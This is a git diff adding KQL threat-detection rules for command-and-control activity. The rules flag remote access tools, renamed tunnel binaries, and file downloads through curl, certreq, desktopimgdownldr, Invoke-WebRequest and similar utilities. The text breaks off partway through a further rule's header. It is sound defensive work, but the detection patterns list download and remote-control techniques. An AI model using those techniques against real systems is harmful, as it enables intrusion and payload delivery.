/dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2022-02-25 +// Level: medium +// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. + +DeviceProcessEvents +| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd") \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql new file mode 100644 index 00000000..222a5089 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - Simple Help Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents +| where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql new file mode 100644 index 00000000..22cd54bc --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server +// Author: Ahmed Nosir (@egycondor) +// Date: 2025-05-29 +// Level: medium +// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. +These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. +This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219, attack.t1105 +// False Positives: +// - Legitimate system administrator deploying TacticalRMM + +DeviceProcessEvents +| where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql new file mode 100644 index 00000000..f760057f --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - UltraViewer Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql new file mode 100644 index 00000000..e0c3c2b3 --- /dev/null +++ b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql @@ -0,0 +1,10 @@ +// Title: Remote File Download Via Desktopimgdownldr Utility +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql new file mode 100644 index 00000000..a348e3fb --- /dev/null +++ b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Cloudflared.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: high +// Description: Detects the execution of a renamed "cloudflared" binary. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql new file mode 100644 index 00000000..7c2a00db --- /dev/null +++ b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-28 +// Level: high +// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 + +DeviceProcessEvents +| where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql new file mode 100644 index 00000000..04f718e6 --- /dev/null +++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql @@ -0,0 +1,11 @@ +// Title: Renamed VsCode Code Tunnel Execution - File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: high +// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceFileEvents +| where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/Command and Control/replace_exe_usage.kql new file mode 100644 index 00000000..78089437 --- /dev/null +++ b/KQL/rules/Command and Control/replace_exe_usage.kql @@ -0,0 +1,10 @@ +// Title: Replace.exe Usage +// Author: frack113 +// Date: 2022-03-06 +// Level: medium +// Description: Detects the use of Replace.exe which can be used to replace file with another file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a") \ No newline at end of file diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql new file mode 100644 index 00000000..ffd1f6af --- /dev/null +++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql @@ -0,0 +1,15 @@ +// Title: ScreenConnect Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents +| where FolderPath contains "\\Bin\\ScreenConnect." \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql new file mode 100644 index 00000000..f4cb275b --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Binary Writes Via AnyDesk +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-28 +// Level: high +// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". +According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, +which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql new file mode 100644 index 00000000..a8c50100 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql @@ -0,0 +1,15 @@ +// Title: Suspicious CertReq Command to Download +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-11-24 +// Level: high +// Description: Detects a suspicious CertReq execution downloading a file. +This behavior is often used by attackers to download additional payloads or configuration files. +Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql new file mode 100644 index 00000000..bad8158b --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Child Process Of Manage Engine ServiceDesk +// Author: Florian Roth (Nextron Systems) +// Date: 2023-01-18 +// Level: high +// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate sub processes started by Manage Engine ServiceDesk Pro + +DeviceProcessEvents +| where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and (not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql new file mode 100644 index 00000000..6cc4fb27 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Curl Change User Agents - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects a suspicious curl process start on linux with set useragent options +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql new file mode 100644 index 00000000..c2c540d7 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Curl.EXE Download +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql new file mode 100644 index 00000000..412c5335 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Desktopimgdownldr Command +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql new file mode 100644 index 00000000..819ffe34 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Desktopimgdownldr Target File +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql new file mode 100644 index 00000000..5e9fd847 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Diantz Download and Compress Into a CAB File +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Download and compress a remote file and store it in a cab file on local machine. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql new file mode 100644 index 00000000..1b0969d9 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Download from Office Domain +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-27 +// Level: high +// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608 +// False Positives: +// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) + +DeviceProcessEvents +| where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString(")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql new file mode 100644 index 00000000..9f87de9e --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Dropbox API Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-20 +// Level: high +// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002 +// False Positives: +// - Legitimate use of the API with a tool that the author wasn't aware of + +DeviceNetworkEvents +| where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath contains "\\Dropbox")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql new file mode 100644 index 00000000..5a108eba --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Extrac32 Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Download or Copy file with Extrac32 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql new file mode 100644 index 00000000..675095d1 --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation +// Author: frack113 +// Date: 2022-12-23 +// Level: medium +// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1132.001 +// False Positives: +// - Legitimate administrative script + +DeviceProcessEvents +| where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql new file mode 100644 index 00000000..d94a68cc --- /dev/null +++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Invoke-WebRequest Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql new file mode 100644 index 00000000..4ab6508c --- /dev/null +++ b/KQL/rules/Command and 